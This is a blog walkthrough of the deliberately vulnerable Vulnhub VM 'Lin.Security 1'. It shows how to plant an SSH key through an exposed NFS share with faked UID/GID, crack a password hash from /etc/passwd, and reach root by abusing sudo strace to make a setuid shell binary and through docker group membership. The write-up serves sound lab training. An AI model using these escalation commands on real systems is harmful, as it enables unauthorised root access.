2018-07-15

Vulnhub Linux VM "Lin.Security 1" Walkthrough

Hello All,

This blog post is about the walk through of the vulnerable Linux VM "Lin.Security 1"
download Link :-  https://www.vulnhub.com/entry/linsecurity-1,244/

After configuring the VM, I started with Port scanning using NMap scanner.
Result was following


Port 2049 is open and it is for NFS share service

To check the available shares on the machine, ran below mentioned command which shows the NFS share

showmount -e Machine_IP

share "/home/peter" is available for any IP.
Let's mount it on attacker machine using below mentioned command

mount -t nfs Machine_ip:share_name local_machine_directory -nolock

I mounted NFS share on directory having name "b0x"


ls -al command shows the content of the home directory of the user peter ("/home/peter")

after checking permission of the mounted share using below mentioned command

stat b0x


After searching on internet i came to know about NFS share vulnerability according to which "to access NFS share, uid and gid need to match the ones of the shared directory on the server"
Currently, NFS share permission is having UID 1001 and GID 1005.

so we need to have a OS user having name "ftp" with UID "1001" and GID "1005".


after changing the UID and GID of OS user FTP, switch to is and try to create a file so that we can confirm that we are having privilege to create file directory on the mounted share.

Now, i created .ssh directory and copied "id_rsa.pub" key of the user "ftp" to mounted share in directory ".ssh" with name "authorized_keys" so that i can SSH to machine from my machine using SSH key.


After pushing the SSH key file, we can login to machine by using below mentioned command:

ssh peter@machine_IP


Now, we are inside the machine. I read the "/etc/passwd" file and got a OS user "insecurity" entry having UID 0 and having unix hash in "Shadow masking" field


I searched about it and found that, in old systems, "/etc/passwd" file used to have password hash of the OS user. So I cracked the hash using Hashcat and got the plain text password of the hash


Now, i logged in as user "insecurity" using the recovered password and got root user privilege on the machine using one method.


As machine designer mentioned, there are multiple ways to root this machine, so i checked another possibilities as well and figured out that user "peter" is capable of running "strace" binary with sudo privilege. i used below mentioned command to check if user "peter" is having sudo privilege on executing any binary
sudo -l 


Now, to take advantage of executing "strace" with sudo, I planned to compile a C program which drop user to "/bin/sh" shell, using sudo strace changing ownership to root user and making it SUID binary.

Code of C program which i used


compiled program using below mentioned command

gcc r.c -o r



After compiling the code, ran below mentioned command to change the ownership of the compiled C code file

sudo /usr/bin/strace chown root:root r


Check if command executed successfully or not


It worked and now binary is having owner "root".
To set SUID bit on file, ran below mentioned command using "strace" with sudo

sudo /usr/bin/strace chmod u+s r


Let's check whether binary is having SUID set on it by listing the permissions of file.


Great, now binary is having SUID bit as well set on it. now we just need to execute the binary and as we know that binary owner is "root" user and it is having SUDI bit set on it so we will get "/bin/sh" Shell with privilege of "root" user
Let's execute the binary and check whether we got "root" privilege or not by executing below mentioned command

./r


And yes, it worked and now we are in root "/bin/sh" shell :)

Using Docker
Machine is running docker in it and after searching little bit i came to know that if we have access to OS user account which is having membership of "docker" group, we can get root shell by using below mentioned commands

docker run --privileged --interactive --tty --volume /:/host bash
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

Current user is member of "docker" group


Let's get root shell using above mentioned commands xD

Using first command


Using second command



As machine designer mentioned that there are multiple ways to get "root" privilege on the machine so try to get another ways as well.

Thanks for reading.

--==[[ With Love from Team IndiShell ]]==--
                             
 --==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Dinelson Amine, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash, D3
#############################################################################################
                             --==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, Anurag, Cyber Warrior
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)


Share this post

0 comments

© 2009 Start With Linux | Mannu Linux
Designed by cyb3r.gladiat0r
Posts RSSComments RSS
Back to top